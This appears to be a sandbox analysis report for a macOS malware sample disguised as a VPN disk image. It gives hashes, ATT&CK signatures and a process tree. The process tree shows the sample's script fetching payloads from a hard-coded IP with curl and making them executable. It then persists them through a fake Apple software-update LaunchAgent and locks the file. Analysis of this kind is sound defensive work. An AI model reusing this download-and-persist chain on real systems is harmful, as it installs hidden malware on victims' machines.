Overview

overview

10

Static

static

10

Covid/covid

windows11-21h2-x64

1

Covid/covid

macos-10.15-amd64

1

Covid/softwareupdated

windows11-21h2-x64

1

Covid/softwareupdated

macos-10.15-amd64

1

Covid/vpn.dmg

windows11-21h2-x64

3

Covid/vpn.dmg

macos-10.15-amd64

7

vpn.app/Co...OS/vpn

windows11-21h2-x64

1

vpn.app/Co...OS/vpn

macos-10.15-amd64

7

vpn.app/Co...script

windows11-21h2-x64

1

vpn.app/Co...script

macos-10.15-amd64

7

Resubmissions

07-11-2024 18:36

241107-w9c14sxcjh 10

Analysis

  • max time kernel
    80s
  • max time network
    99s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241101-en
  • resource tags

    arch:amd64arch:i386image:macos-20241101-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
  • submitted
    07-11-2024 18:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Covid/vpn.dmg

  • Size

    1.2MB

  • MD5

    c31001dd6ab78d911243c0e29b0dbdd6

  • SHA1

    563d75660e839565e4bb1d91bc1236f5ec3c3da7

  • SHA256

    29bb22553c16b32057b30c240b30e2f4fe107d9ccfb6b2d0dbece6f41a2419d6

  • SHA512

    9bb41b94104051a667cd2abe0618b785d9a764518dc350a472e0c54f8c5fb3d33efd6d5239ad8307cf6870cc37a1ac113d8439c7d4bcd5aba18b92ef11bf3409

  • SSDEEP

    24576:WBEYQSJso6qMUTGr+rW5D3hl+5P9wAYntG954QoJm3qEUxGFMlpPX:/SJQUTjWB3hc5VNY89NoJcUx

Score
7/10
evasionexecutionexfiltrationpersistence

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol 1 TTPs 2 IoCs

    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

    exfiltration
  • Launch Agent 1 TTPs

    Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence.

    persistence
  • Resource Forking 1 TTPs 1 IoCs

    Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

    evasion
  • Launchctl 1 TTPs 2 IoCs

    Adversaries may abuse launchctl to execute commands or programs. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.

    execution

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"open /Volumes/vpn/vpn.app\""
    1⤵
      PID:513
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"open /Volumes/vpn/vpn.app\""
      1⤵
        PID:513
      • /usr/bin/sudo
        sudo /bin/zsh -c "open /Volumes/vpn/vpn.app"
        1⤵
          PID:513
          • /bin/zsh
            /bin/zsh -c "open /Volumes/vpn/vpn.app"
            2⤵
              PID:514
            • /usr/bin/open
              open /Volumes/vpn/vpn.app
              2⤵
                PID:514
            • /usr/libexec/xpcproxy
              xpcproxy com.apple.softwareupdate.2324
              1⤵
                PID:515
              • /Volumes/vpn/vpn.app/Contents/MacOS/vpn
                /Volumes/vpn/vpn.app/Contents/MacOS/vpn
                1⤵
                  PID:515
                • /bin/bash
                  /bin/bash /Volumes/vpn/vpn.app/Contents/Resources/script
                  1⤵
                    PID:518
                    • /usr/bin/uname
                      uname -m
                      2⤵
                        PID:519
                      • /bin/mkdir
                        mkdir /Users/run/.androids
                        2⤵
                          PID:520
                        • /usr/bin/curl
                          curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated
                          2⤵
                            PID:521
                          • /bin/chmod
                            chmod a+x /Users/run/.androids/softwareupdated
                            2⤵
                              PID:534
                            • /bin/chmod
                              chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist
                              2⤵
                                PID:535
                              • /bin/launchctl
                                launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist
                                2⤵
                                  PID:536
                                • /bin/launchctl
                                  launchctl start softwareupdated
                                  2⤵
                                    PID:538
                                  • /Users/run/.androids/softwareupdated
                                    /Users/run/.androids/softwareupdated
                                    2⤵
                                      PID:539
                                    • /usr/bin/chflags
                                      chflags uchg /Users/run/.androids/softwareupdated
                                      2⤵
                                        PID:540
                                      • /usr/bin/curl
                                        curl -L http://46.137.201.254/covid -o /Users/run/covid
                                        2⤵
                                          PID:541
                                      • /usr/libexec/xpcproxy
                                        xpcproxy softwareupdated
                                        1⤵
                                          PID:537
                                        • /Users/run/.androids/softwareupdated
                                          /Users/run/.androids/softwareupdated -D
                                          1⤵
                                            PID:537

                                          Network

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads